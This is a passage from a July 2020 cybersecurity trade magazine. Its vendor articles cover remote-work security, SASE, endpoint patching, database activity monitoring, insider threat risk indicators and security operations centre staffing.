Introducing multi-factor authentication (MFA) for home workers can add extra security for business

assets. Using MFA to access cloud storage such as Onedrive, or when accessing Exchange email

systems and collaboration tools such as Slack, Teams, or Skype for Business, will add an extra layer of

security when out of the office.

Communication and the Training of Homeworkers

Lots of people have worked from home in the past, but for many, COVID-19 has forced employees to

use technology and work from home for the first time. For many, this change is extremely difficult to adapt

to. Not only at a technical level, but adapting to online meetings and working on your own.

This introduces many security risks. Employees may not remember all the rules of home working. They

may bring their device or they may unintentionally share confidential information on social media.

Clear and concise communication channels from senior management or HR should communicate a

consistent message defining what the expectations of the employee are. The messaging should describe

how the business intends to function during a lockdown and what the company priorities are.

Combine that with training sessions, online classes, or one-on-one training about how to use

collaboration tools, cloud productivity tools, and how working from home affects access to everyday user

applications.

Engaging with employees regularly is a great way to promote wellbeing at work, and keep productivity

and engagement throughout the business. This benefits morale, and importantly creates a greater

understanding of how to use computer systems securely.

Cyber Defense eMagazineJuly 2020 Edition 34

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


System Updates / Antivirus

Security updates to operating systems and applications have never been more important than during the

COVID-19 crisis. System administrators have the responsibility of ensuring that the mobile workforce

information technology is up to date and has the latest security updates.

When an employee's laptop connects to a corporate network, it will typically check in with a centralized

administration portal, such as Microsoft System Center (SCCM). Toolsets like this manage the update

schedule of thousands of laptops, computers, and mobile devices over a VPN or standard Internet

connection.

Administrators can force updates out on demand to keep antivirus, antimalware, and system updates at

the latest level. This creates the best line of defense against malware and ransomware attacks.

Software Protections

The software on the portable equipment must comply with the organizational standards to ensure it is

supportable. As mentioned earlier, up-to-date antivirus detection software is installed to protect local

systems. No unauthorized software should be loaded on to company assets, no matter how trivial.

Software should not be tampered with to circumvent security measures put in place, such as disabling

antivirus system scans.

Any tampering of the software should be considered a disciplinary offense, and the antivirus suite should

be configured to audit user behavior. When used to access the Internet, the user’s device should utilize

a proxy server where the activity is logged and monitored.

About the Author

Marty Puranik co-founded Atlantic.Net from his dorm room at the

University of Florida in 1994. As CEO and President of Atlantic.Net,

one of the first Internet Service Providers in America, Marty grew the

company from a small ISP to a large regional player in the region, while

observing America's regulatory environment limit competition and

increase prices on consumers. To keep pace with a changing industry, over the years he has led

Atlantic.Net through the acquisition of 16 Internet companies, tripling the company's revenues and

establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting

before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries.

Cyber Defense eMagazineJuly 2020 Edition 35

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The Race to Pivot Around Remote Work and The

Emergence Of SASE

By Amit Bareket, CEO and Co-Founder of Perimeter 81

When Kodak completely neglected the rise of digital photography (an idea that Kodak itself invented) and

then continued to willfully drive for a revival of technology destined for the dustbin, it became the

boilerplate example of what can happen when an organization fails to embrace change, and chooses to

fight against the current rather than go with the flow.

Trends and new sources for demand force companies to refresh their business models and pivot around

new concepts, or slowly perish. This is happening now in security, where providers still get away with

offering singular and traditional solutions like firewalls, antivirus software, and VPNs - but not for long.

These products do help to ward off a number of the most common attacks, but converging trends have

whipped up industry waves almost reminiscent of those that once toppled the giant of film.

Crowding the Cloud

The adoption of cloud technology among companies has been full steam ahead for the last decade or

more, and as it becomes our new normal, the security industry must react with new ways to protect data

that’s anywhere and everywhere. For a business, ascension to the cloud has been deliberately slow, a

department here, a business flow there, so the tide of this sea change has been gradual.

At least, it was until recently. No one wants to harp on the lessons taught by COVID-19, but here we are.

Suddenly, organizations with a desire to exist into the next fiscal year find themselves scrambling to grant

Cyber Defense eMagazineJuly 2020 Edition 36

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


access to remote employees, and this has meant the rapid adoption of cloud technologies and

subsequent creation of a host of new issues that security providers must now respond to.

Overloaded networks on traditional architecture experience high latency, and each new employee

connecting to the resources they need to work slows down the connection speed of his or her peers.

Performance is small potatoes, though. IT teams are more overwhelmed with the number and variety of

different devices and unfamiliar sources of traffic, and security leaders are racing to provide a better

solution than what was available just last year.

IT Still Catching Up Cloud-Wise

Many cloud services tied into local environments and available to many remote workers (often from

personal Wi-Fi connections with dubious security) create gaps where exposure occurs, even due to small

issues such as how they’re configured. A business’s resources may be secure but the wrong box ticked

in the admin panel of a cloud-based service is enough to open cracks that need just a bit of pressure to

widen into a breach.

Sensitive data is also exchanging more hands faster than ever, during a time when hackers are ramping

up their activities to take advantage of the pandemic panic. Under these conditions, orchestrating a stack

of traditional security products isn’t enough, even if they can be deployed in a way that secures the

network on paper. We don’t live on paper. In reality, the tool sprawl approach creates maintenance issues

that the security industry must address alongside classic ideas like threat detection and visibility.

For IT, planning security for in-office infrastructure is simpler, because all employees are always

connecting from the same devices, locations, and IP addresses. Very few security “profiles” need to be

built, so even with an unwieldy and piecemeal stack of different security tools, smart network access

doesn’t need to be scalable. Once network traffic moves from inside the office to outside, however, each

remote worker represents a unique threat.

Remote Work Accelerates the Materialization of SASE

Which providers will be the ones to respond best to the future of remote work - the one where the idea of

remote network access is fast, secure, and scalable? Surely not those who still offer singular firewall

services, or those with a basic VPN solution. None of these solutions alone is enough to defend the

network. Funnily enough, the blueprint for a single security product that might do so was created only

months before the conditions that would necessitate it.

This security ‘blueprint’ is at the heart of a new industry space race. In fact, the idea is so young that it is

prevalent largely among providers rather than the consumers of security, such as in-house IT

professionals. Called SASE, or Secure Access Service Edge, Gartner coined this term to describe a

unified network security product deployed over the cloud (SaaS), which would change how organizations

consume security and refocus it around users.

Cyber Defense eMagazineJuly 2020 Edition 37

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Imagined as able to integrate directly with all the resources used by any organization, sans hardware, a

SASE product will make it stunningly simple for the average IT employee to segment the network and

create custom access profiles based on user roles, devices, or locations. At the same time he or she can

enforce the use of advanced security features still sold separately, like IPSec tunneling, 2FA, DNS

filtering, FWaaS, and CASB, and route employee traffic through secured gateways closest to wherever

they choose to work.

The Beacon is Lit

It wasn’t the idea of SASE that signaled the starting gun for the security sector’s space race, it was the

rush to support remote workers and the off-hand realization that SASE was a prebuilt solution. The rising

trend of remote work has then also paralleled the prevalence of SASE in the market, and significant

progress has occurred in the space to bring the horizon closer. In the near future, any enterprise-level

company will only need to deploy a single product to secure its local and cloud networks, and the

employees connecting to them from couches and cafes around the world.

Mergers and acquisitions are happening at breakneck speed in the security industry right now, and the

landscape a year from now will be nearly unrecognizable. Reminiscent of how other industries have seen

their products and services consolidated (the evolution of Microsoft’s product suite into Office 365 is a

clear example), security is soon to become a matter of simply point, and click.

About the Author

Amit Bareket is the Co-Founder and CEO of Perimeter 81. Amit is

a cybersecurity expert with extensive experience in system

architecture and software development. He is the author of 8

patents issued by the USPTO for storage, mobile applications and

user interface. Prior to Perimeter 81, Amit worked as a Software

Engineer for major enterprises including IBM XIV Storage and

BigBand Networks. He served in the Israel Defense Force’s elite

cyber intelligence unit and graduated Cum Laude with a B.Sc. in

Computer Science and Economics from Tel Aviv University.

Cyber Defense eMagazineJuly 2020 Edition 38

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Organizations: It’s Time to Rethink How You Protect

Environments from Within

By Richard Melick, senior technical product manager, Automox

Many of us have made the shift to virtual with our work, school and social lives, as we all aim to protect

ourselves and the community during this uncertain time. As such, it’s important to understand that with

new virtual workflows comes an expanded attack surface for hackers to potentially exploit.

In particular, many organizations are struggling with securing and hardening new and existing endpoints

against critical vulnerabilities, an issue that has been exacerbated as remote work policies are enacted.

Automox’s recent Cyber Hygiene Index surveyed 560 IT and security professionals and uncovered that

less than 50 percent of organizations can patch vulnerable systems swiftly enough to protect against

critical threats and zero-day attacks.

Endpoint hardening is a critical component of any security strategy, and if not properly managed, can

pose a major threat to an organization's infrastructure. Attackers only need to find one way in to victimize

a system or device – and an endpoint that isn't equipped with the latest patches and security

configurations is likely to be ripe with exploitable vulnerabilities. It is essentially leaving a door unlocked

with a welcome sign out front for attackers.

Is it possible to lessen devastating data breaches within enterprises? Yes, but effective cyber hygiene

measures must be put into place, especially during transitional and uncertain times like today.

Cyber Defense eMagazineJuly 2020 Edition 39

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The Ongoing Patching and Configuration Crisis

When you couple new potential entry points for hackers to exploit along with the fact that organizations

report taking up to 102 days for patches to be applied and tested, it is apparent that the enterprise attack

surface is growing at an unprecedented rate.

To fully understand the scope of the issue, look no further than three years ago with the WannaCry

ransomware attack. The ransomware was able to spread rapidly by exploiting a known vulnerability that

was left unpatched in a large majority of organizations for months – leading to one of the most notorious

hacking events of our lifetime.

Research for the Automox Cyber Hygiene Index also confirmed that four out of five organizations have

suffered at least one data breach in the last two years. When asked about the root causes, respondents

placed phishing attacks (36%) at the top of the list, which is to be expected. Social engineering attacks

continue to be a favorite initial vector that attackers use.

The surprising part of the results is that the majority of breaches could have been prevented with basic

cyber hygiene practices in place. The other top causes were missing operating systems patches (30%),

missing application patches (28%), and operating system misconfigurations (27%) – all of which are

fundamentals of proper endpoint hardening.

The Industry is Failing to Keep Up

Adversaries are weaponizing new critical vulnerabilities within 7 days on average. And zero-day

vulnerabilities are already weaponized at the moment of disclosure, yet companies are known to take

weeks and in some cases months to deploy patches.

For this reason, a 24 / 72 threshold for endpoint hardening is imperative. If organizations can commit to

eliminating zero-day exploits within 24 hours and other critical vulnerabilities within 72 hours, they’ll

prevent weaponization and ultimately better protect their critical assets.

According to the recent survey, the industry is still catching up to meet this ambitious patching standard.

Only 42 percent of companies can patch remote endpoints within three days and 15 percent within one,

highlighting the struggles companies face with patching and hardening endpoints in remote

environments.

Embracing Newer Technologies to Help

One of the more positive outcomes from the research is that companies are increasingly embracing

automation as a potential antidote for the security challenges that they are currently facing.

The findings showed that 96 percent of organizations have deployed some automation for endpoint

patching and hardening, yet only 23 percent are fully automated.

Cyber Defense eMagazineJuly 2020 Edition 40

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


While newer technologies, such as automation, are not a silver bullet, they sure can help ease the efforts

in protecting infrastructure – and executing complex tasks in a timely manner. This effectively eases the

burden on IT and SecOps teams, all while maintaining better security for the organization as a whole, a

true win-win scenario.

The Answer to Better Cyber Hygiene?

Good cyber hygiene doesn't have to be complicated. A great place to start to make the transition to a

more modern approach is to audit your organization and take a look at how it leverages its people,

processes and technologies to better secure its endpoints and other assets.

Are our people being put in a position to succeed? What processes could be eliminated or improved?

Are we getting enough out of our technologies to make our security team’s workflow easier?

By answering these important questions and acting on that information, organizations will have a better

understanding of how they can adapt their strategies to address today’s and tomorrow’s challenges.

In times of uncertainty, it’s important that businesses look for long-term fixes, as opposed to putting a

band-aid on issues that are likely to pop up again. The future of work is remote, and it’s critically important

that decision-makers across every industry set their IT and security teams up for future success while

meeting the standards they need to meet today.

About the Author

Richard Melick, senior technical product

manager, Automox. Richard has spent over a

decade advancing through the security industry

with his considerable experience and

considerable focus on the stories surrounding

ransomware, hacking, and cyber attacks. He has

been a security speaker on five continents and

has even advised royalty on how to make and

distribute ransomware.

Richard can be reached online at

(Automox@famapr.com, @AutomoxApp, etc..)

and at our company website

https://www.automox.com/

Cyber Defense eMagazineJuly 2020 Edition 41

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Don’t Be Breached When Using Commercial Software

Products

By Randy Reiter CEO of Don’t Be Breached

In May, 2020 the software giant SAP made available eighteen security fixes for its Adaptive Server

Enterprise (ASE) database system (formerly Sybase ASE). ASE is used by SAP products and 30,000

organizations worldwide. 90% of the top 50 banks and security firms use ASE.

Four of the eighteen security fixes had a CVSS score of 8 or higher. Common Vulnerability Scoring

System (CVSS ) is a free and open industry standard for assessing the severity of computer system

security vulnerabilities. Vulnerabilities are scored from 0 to 10 with 10 being the most severe.

One of the security fixes was for SQL Injection Attacks. This vulnerability allowed any user of a database

regardless of their permission level to gain Administrator access to the entire database. Wow.

SAP software products are comprehensive and complex. SAP customers have added on average up to

2 million lines of custom code to their deployment. This makes applying security patches a lengthy

process due to comprehensive application testing requirements prior to deployment of the security fixes.

Other 2020 Database Security Vulnerabilities:

• June, 2020. KingMiner botnet operation targets SQL Server databases with brute force attacks.

The KingMiner botnet has been active since 2018. Once KingMiner gains access to SQL Server

it is capable of gaining root access to the Windows server.

• May, 2020. Hacker leaked online the database for 7,600 websites serviced by Daniel’s Hosting.

Daniel’s Hosting is the largest free web hosting provider for Dark Web services. The leaked

Cyber Defense eMagazineJuly 2020 Edition 42

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


database included 3,000+ email addresses, 7,000+ account passwords and 8,000+ private keys

for .onion (dark web) domains.

How to Protect Confidential Database Data from Insider Threats and Hackers?

Confidential database data includes: credit card, tax ID, medical, social media, corporate, manufacturing,

law enforcement, defense, homeland security and public utility data. This data is almost always stored in

Cassandra, DB2, Informix, MongoDB, MariaDB, MySQL, Oracle, PostgreSQL, SAP Hana, SQL Server

and Sybase databases. Once inside the security perimeter a Hacker or Rogue Insider can use commonly

installed database utilities to steal confidential database data.

Non-intrusive network sniffing can capture and analyze the normal database query and SQL activity from

a network tap or proxy server with no impact on the database server. This SQL activity is very predictable.

Database servers servicing 10,000 end-users typically process daily 2,000 to 10,000 unique query or

SQL commands that run millions of times a day.

Advanced SQL Behavorial Analysis of Database Query and SQL Activity

Advanced SQL Behavioral Analysis of the database SQL activity can learn what the normal database

activity is. Then from a network tap or proxy server the database query and SQL activity can be nonintrusively

monitored in real-time and non-normal SQL activity immediately identified. Non-normal SQL

activity from Hackers or Rogue Insiders can be detected in a few milli seconds. The Hacker or Rogue

Insider database session can be immediately terminated and the Security Team notified so that

confidential database data is not stolen.

Advanced SQL Behavioral Analysis of the query activity can go even further and learn the maximum

amount of data queried plus the IP addresses all queries were submitted from for each of the 2,000 to

10,000 unique SQL queries sent to a database. This type of data protection can detect never before

observed query activity, queries sent from a never observed IP address and queries sending more data

to an IP address than the query has ever sent before. This allows real-time detection of Hackers and

Rogue Insiders attempting to steal confidential web site database data. Once detected the security team

can be notified within a few milli-seconds so that a data breach is prevented.

About the Author

Randy Reiter is the CEO of Don’t Be Breached a Sql Power Tools company. He

is the architect of the Database Cyber Security Guard product, a database data

breach prevention product for Informix, MariaDB, Microsoft SQL Server, MySQL,

Oracle and Sybase databases. He has a Master’s Degree in Computer Science

and has worked extensively over the past 25 years with real-time network sniffing

and database security. Randy can be reached online at

rreiter@DontBeBreached.com, www.DontBeBreached.com and

www.SqlPower.com/Cyber-Attacks.

Cyber Defense eMagazineJuly 2020 Edition 43

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Is Proactive Insider Risk Mitigation Possible?

Why Companies Need More Than Technical Indicators to Identify Their Biggest Threats Before They

Do Harm

By David A. Sanders, Director of Insider Threat Operations, Haystax

Most corporate insider threat programs are structured and equipped to mitigate adverse events

perpetrated by trusted insiders only after they have occurred. But proactive insider risk management is

possible – and it starts with a robust approach to detection.

Consider this scenario, based on a real-life case, in which a concerning insider threat event turns out to

be more complicated than expected:

John commented to other employees that it would be easy to take down the new cloud services

his company recently migrated to from their on-premises systems. The employees reported the

comment to their manager, who reported it to human resources and ultimately the company’s

insider threat program. An investigation revealed that John was angry because his role had

changed with the new architecture. In addition, he was clinically depressed, off medication and

had suicidal thoughts. The investigative results prompted a coordinated response among the

insider threat program, security, legal and human resources. The threat was mitigated, with the

final step of referring John to the employee assistance program.

Because the insider threat team was notified about one behavioral indicator of a high-impact event,

additional indicators were gathered and assessed to determine that John was a potential threat to the

company and to himself. In doing so, the company was able to intervene and proactively mitigate an

insider threat event before it occurred. The resulting cost and impact were minimal. By contrast, the

projected cost and impact of the cloud services being taken off-line for one day were very high.

Cyber Defense eMagazineJuly 2020 Edition 44

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


It is impossible to know whether John would have committed an act of sabotage or self-harm, but the

mitigation efforts nevertheless reduced the chances and allowed John to remain employed and

productive.

Without a proactive response, the alternative is to detect and respond to an event after it occurs, incurring

the cost of the impact then attempting to minimize the effect.

The Path to Proactive Risk Mitigation

Eric Shaw and Laura Sellers created the ‘Critical Path to Insider Risk’ in 2015, after studying insider threat

cases in the U.S. intelligence community and at the Department of Defense. They concluded that

perpetrators exhibit observable indicators prior their acts. This concept is represented in the graphic

below.

Source: Eric Shaw and Laura Sellers (2015) "Application of the Critical-Path Method to Evaluate Insider

Risks," Studies in Intelligence, Volume 59, Number 2, June, pages 41-48. The Central Intelligence

Agency, Washington, DC.

The practical application of these findings is that knowledge of ‘personal predispositions’ and behavioral

indicators can inform the judgment of experts to determine whether an insider is on the path to becoming

a risk.

Based on that judgment, a measured and effective response can be planned to assess the risk through

preliminary assessments – and perhaps a complete investigation, if warranted. The goal is to mitigate or

Cyber Defense eMagazineJuly 2020 Edition 45

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


prevent the insider risk event by engaging with the potential threat early. This is precisely what occurred

in John’s case. The company responded effectively to ‘turn John around’ and prevent potentially hostile

and harmful acts from occurring.

Technical and Non-Technical Risk Indicators

The Defense Counterintelligence and Security Agency (DCSA) Center for Development of Security

Excellence published a list of potential risk indicators, which are categorized below into ‘Technical

Indicators’ and ‘Non-Technical Indicators.’ Technical indicators can be detected by monitoring and

analyzing computer and network activities. Non-technical indicators typically occur off the computer and

network and therefore cannot be detected on those systems.

Insider threat potential risk indicators categorized by whether or not they can be commonly detected by

monitoring computer and network activity.

While the average enterprise insider threat program might not share the same objectives as DCSA, the

agency’s human-centric view of the challenge is instructive to companies because the cause of insider

threat problems is, by definition, known individuals associated with and managed by the organization.

Effort and resources allocated to gathering, integrating and analyzing non-technical indicators to better

know those individuals can improve the effectiveness of programs that mostly rely on technical indicators

Cyber Defense eMagazineJuly 2020 Edition 46

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


to prioritize higher-risk employees. In this regard, non-technical indicators help programs to get ahead of

insider threat problems, rather than simply react to them.

Using Non-Technical Risk Indicators

Non-technical indicators are available within most company systems. For example, human resource

information systems will contain data about promotions, demotions, suspensions, performance ratings,

training records and previous employers. Security information systems may have records of violations,

anomalous attempts to gain access to unauthorized areas and, in the case of the defense and aerospace

industry, security-clearance denials.

Facilitating the identification and reporting of additional kinds of non-technical behaviors can be more

challenging. For example, ‘See Something, Say Something” programs have limited utility for multiple

reasons. First, co-workers often do not consciously recognize the indicators until they are significant or

until something bad happens. Second, if they do recognize a concern, they rarely report it because they

do not see it as significant, or they do not want to get someone they like in trouble.

To overcome these challenges, insider threat programs need to repeatedly communicate that the goal of

the program is to mitigate risks in a proactive and positive manner, helping employees while protecting

company assets. As this goal is accomplished, stakeholders, supervisors and employees will take notice,

which will increase compliance and participation in the reporting program.

Next, insider threat programs need to facilitate the reporting of anomalous activity by supervisors. This

can be accomplished via direct conversations, indirectly through human resources or by using surveys.

The results of this reporting should then inform the insider threat program threat detection capability.

Temporal Analysis

The importance of integrating and analyzing indicators over time cannot be overstated. Let’s consider a

fictitious scenario where there are non-technical behavioral indicators that increase the threat level of an

employee:

Jolene has been with her company for three years. Initially she was a good performer but that has

changed over the past two years. She has grown increasingly unhappy with her job as a database

administrator and her personal life is in shambles. She finds her role trivial and she feels the

company is not treating her fairly compared to others, which she has expressed to human

resources. She applied for a position in another department but was not selected, which made

her even more angry and frustrated. She has access to mission-critical systems with authorization

to create and destroy databases, tables and records. Her supervisor works from another office

location, and does not meet with her more than once every two weeks. Outside of work, Jolene

barely has enough money to pay rent for a two-bedroom apartment since her boyfriend left town.

Cyber Defense eMagazineJuly 2020 Edition 47

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Moreover, she recently wrecked her truck and her cat is sick again. She is not sleeping well and

has turned to drugs and alcohol.

Jolene has moved far along the critical path to insider risk. She has multiple stressors, exhibits concerning

behaviors and has experienced problematic organizational responses. And she has access to critical

company systems.

It would be wise to fully evaluate then mitigate any risk that Jolene presents, with the goal of protecting

company assets and assisting a struggling employee. Yet very few companies have the capability to

assemble and analyze this non-technical information to effectively identify when an insider like Jolene is

on the path to insider risk. Assessing employees’ private lives through background or credit checks or

other measures is not even necessary in most cases; many other indicators are already collected by the

organization and readily available.

The inadequate use of non-technical indicators might be due to the fact that many insider threat programs

grow out of existing cyber security programs using management tools such as UEBA and SIEM, which

were developed to evaluate large volumes of technical data using rules and machine learning to identify

technical behavioral anomalies.

As discussed above, when looking at insider threats as caused by known humans, these technical

indicators are perhaps one-third of the picture. Risk-scoring models built solely around technical

indicators are not designed to put the anomalies that they detect into the broader context of the critical

path to insider risk. These models can only be effective if they add non-technical behavioral indicators to

the analytical mix.

Multi-Disciplinary Technology Platforms for Evaluating Insider Threats

Insider threat programs should consist of diverse experts representing human resources, legal,

information security, cybersecurity, information technology, physical security, behavioral science and

counterintelligence. These disciplines bring data and perspective when evaluating insider threats. They

weigh evidence and give opinions on whether the behavior is indicative of a threat.

The problem is that this approach does not scale well in organizations with large numbers of employees,

since no team of experts could keep up.

But the experts can share their judgments and wisdom in analytic tools that apply complex reasoning that

goes into contextualized analysis of insider threats. For this approach, Bayesian inference networks are

an ideal solution.

Bayesian networks can be built to probabilistically model expert reasoning across multiple domains using

the full range of technical and non-technical behavioral indicators of insider risk. The result is a vastly

improved capability to identify high-risk insiders that have committed threat activities, as well as those

who are on the Critical Path to potentially commit them in the future. The probabilistic model enables the

desired proactive response necessary to protect company assets, including the insiders themselves.

Cyber Defense eMagazineJuly 2020 Edition 48

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

David Sanders is Director of Insider Threat Operations at Haystax, a

business unit of Fishtech Group. Previously, he designed and managed

the insider threat program at Harris Corporation, now L3Harris

Technologies. David also served on the U.S. government’s National

Insider Threat Task Force (NITTF). David can be reached online at

(dsanders@haystax.com or https://www.linkedin.com/in/david-sandershaystax/)

and at our company website http://www.haystax.com/

Cyber Defense eMagazineJuly 2020 Edition 49

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Benefits of A Security Operation Center (SOC)

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt

The creation of a Security Operations Ce nter (SOC) has increasingly stood out as something necessary

to help companies defend themselves against damage caused by cyber-attacks. SOC is considered the

kernel of an organization's security operations, the purpose of which is to provide detection and response

services to security incidents.

The creation of a SOC from-scratch involves a large investment in human and technological resources,

especially when it is intended to maintain operations on a full-scale 24×7. Implementing a SOC solution

goes far beyond buying technologies and putting it into operation. First, there is a great shortage of

qualified professionals which makes it a real challenge to bring them into your organization. From a

technological perspective, the right equipment and the right platforms can help you automate or at least

optimize your incident detection and response capabilities. How to decide the best option: Implement or

Hire a SOC? The answer is not simple.

Create your own SOC or Hire a third-party SOC

One of the advantages of creating your own SOC is having a team exclusively dedicated to achieving

your goals. This team will have a deep understanding of the business. They will better understand the

general context around events and have more knowledge about how you operate in contrast to a third

party SOC.

Cyber Defense eMagazineJuly 2020 Edition 50

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


On the other hand, buying a SOC solution can be cost-effective. You may not need to buy software or

equipment directly, and you won't have to hire or manage the team full time. Managed Security Service

Provider (MSSP) will take care of everything for you - from the integrity of the infrastructure to triage and

incident response. Since obtaining technology and personnel costs will not a preoccupation for you, the

total investment value may end up being much lower.

How to choose the best option

The responses are not linear, but some questions can help you to make the final judgment.






How do security and SOC align with the business strategy and mission?

Do you intend to operate on a 24 × 7 scale?

Are the investments involved justified?

Does your business need greater control by demanding its own SOC?

What would happen to your business if it suffered a security breach?

When considering the last question, if the impact is minimal, it is suggested to hire a SOC solution. If the

impact is quite significant, then I advise you to develop your own SOC solution.

Developing a SOC can be very costly if not done in the right way. Some mistakes can even compromise

your business goals and objectives. The lack of experienced professionals in the market definitely makes

managing your own SOC a little more challenging - the demand is huge and your partners and

competitors looking for the same resources as you.

In sum, the challenge of implementing a SOC in your organization is enormous, but the benefits are

notorious.

Continuous Protection: Having a command center that monitors your network and/or facility 24/7.

Timely Response: The gap between critical event and response time narrows.

Help Customers/Stakeholders Feel Secure: A security command center can serve external and

internal marketing purposes as well.

Simplify Investigations: Capabilities of a security operations center on hand can expedite the process

of analysis.

And last but not least, a SOC solution can provide insight on identifying threats before they become

critical events.

Cyber Defense eMagazineJuly 2020 Edition 51

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Pedro Tavares is a cybersecurity professional and a

founding member of CSIRT.UBI and Editor-in-Chief of

seguranca-informatica.pt.

In recent years he has invested in the field of information

security, exploring and analyzing a wide range of topics,

malware, ethical hacking (OSCP-certified), cybersecurity,

IoT and security in computer networks. He is also a Freelance Writer.

Segurança Informática blog: www.seguranca-informatica.pt

LinkedIn: https://www.linkedin.com/in/sirpedrotavares

Twitter: https://twitter.com/sirpedrotavares

Contact me: ptavares@seguranca-informatica.pt

Cyber Defense eMagazineJuly 2020 Edition 52

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


In 2020, SOCs Are Understaffed Yet Overconfident in

Ability to Detect Cyberthreats

Exabeam’s ‘2020 State of the SOC Report’ offers peer-to-peer SOC comparisons

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing

manager, Exabeam

Security operations centers (SOCs) are on the frontlines in protecting businesses and government

agencies against cyberthreats and attacks. Therefore, whether the organization has an in-house or

outsourced SOC, it’s critical to gauge the effectiveness, given the importance it plays in the overall

cybersecurity posture.

Exabeam’s 2020 State of the SOC Report allows organizations to compare their SOCs to those of their

peers around the globe and determine common pitfalls, priorities and ways to improve technology,

staffing, employee happiness and more. Highlights include:

This report is the Exabeam’s third annual comprehensive survey of cybersecurity professionals who

manage and operate SOCs. Respondents include CISOs, CIOs, frontline security analysts, and security

managers from the U.S., U.K., Canada, Germany, and Australia. The report covers a wide range of

topics including basic SOC operations, hiring and staffing, operational processes, technology and finance

and budget.

Key findings include that SOC leaders and analysts are confident in their ability to detect common security

threats but do not agree on the threats. In addition, SOC leaders and frontline analysts do not agree on

the most common threats facing the organization. SOC leaders believe that phishing and supply chain

vulnerabilities are more important issues, while analysts see DDoS attacks and ransomware as greater

threats.

Cyber Defense eMagazineJuly 2020 Edition 53

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


However, threat hunting and the ability to remediate threats effectively stand out as critical skills that SOC

personnel feel they lack. This gap may indicate that SOCs are overconfident in their ability to detect a full

range of security threats.

Figure 1: Eighty-two percent of SOC professionals are confident in their ability to detect threats.

Cyber Defense eMagazineJuly 2020 Edition 54

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Figure 2: SOC leaders believe that phishing and supply chain vulnerabilities are more important issues,

while analysts see DDoS attacks and ransomware as greater threats.

In last year’s report, respondents cited personal and social skills as the most critical soft skill for SOC

employees. This year, however, 62% of respondents noted the ability to work in teams as the most

important soft skill.

Cyber Defense eMagazineJuly 2020 Edition 55

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Figure 3: While hard skills remain critical, SOCs place emphasis on soft skills with the ability to work in

teams taking precedence over formerly reported social ability.

The importance placed on teaming is an indication that SOC staff need to work in cohesive teams and

often with staff from other teams. SOC members that work as a team are more apt to document processes

to standardize tasks and train new employees, which is helpful both as teams grow or are reassigned.

Members of a SOC should not only improve teaming among their group, but also proactively strengthen

their working relationship with other functional groups, including IT operations, NOC staff, and

increasingly, DevOps. Working with these other groups helps to improve response time. More important,

Cyber Defense eMagazineJuly 2020 Edition 56

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


it will create a team that is responsive and able to adapt as the work environment shifts due to challenges

like working with a distributed workforce and ensuring the right collaboration and communications tools

and culture are in place.

The report also reveals a significant decline in the ability to do threat modeling in both the U.S. and U.K.

SOCs. Threat modeling is the systematic approach to identifying and prioritizing potential security threats

and designing countermeasures to prevent them. The data suggests threat modeling doesn’t have an

agreed upon standard, and most analysts perform it infrequently or not at all.

Additionally, the ability to conduct incident analysis and budget and resource allocation for both countries

have declined from the previous year.

Figure 4: U.S. and U.K. SOCs reported significant declines in their ability to do threat modeling, incident

analysis and budget/resource allocation in YoY change.

The findings also show that when asked to rate pain points, inexperienced staff and time spent on

reporting/documentation were common issues for managers and frontline employees but not for

executives.

Lending credence again to the statement, “you can’t protect what you can’t see,” senior leaders noted

that the lack of visibility and not having a good list of assets were their most significant pain points.

Cyber Defense eMagazineJuly 2020 Edition 57

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Figure 5: Inexperienced staff and too much time spent on reporting and documentation continue to be

pain points for SOCs in 2020.

Traditionally, SOC teams have generally been responsible for two primary responsibilities — investigating

suspicious activities and maintaining security tools. But over the years, the responsibilities of the SOC

has increased to include other duties such as defining security metrics and incident response. Our report

finds that staff at all levels share these responsibilities. However, there are a couple of differences.

CIOs and CISOs rank their responsibility for operations management as well as policy and procedure

development highest. They also share other responsibilities with managers and frontline employees,

including defining security objectives and metrics and incident response. Not surprisingly, maintaining

security monitoring tools was noted as a critical responsibility for frontline employees.

Cyber Defense eMagazineJuly 2020 Edition 58

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Figure 6: SOC managers drive metrics specifically in operations and management and procedure and

policy development.

Download the complete report to learn other points of interest that can help measure the effectiveness

of your SOC and support you in your ongoing efforts to protect your organization.

About the Author

Samantha Humphries

Senior Product Marketing Manager

Samantha has 20 years of experience in cyber security. She has

defined strategy for multiple security products and technologies,

helped hundreds of organisations of all shapes, sizes, and

geographies recover and learn from cyberattacks, and trained

anyone who’ll listen on security concepts and solutions. She

authors articles for various security publications, and is a regular

speaker and volunteer at industry events, including BSides,

IPExpo, CyberSecurityX, The Diana Initiative, and Blue Team

Village (DEFCON)."

Stephen Moore

Chief Security Strategist

Steve Moore is Vice President and Chief Security Strategist at

Exabeam, helping drive solutions for threat detection and

advising customers on security programs and breach response.

He is the host of the “The New CISO Podcast” and a Forbes

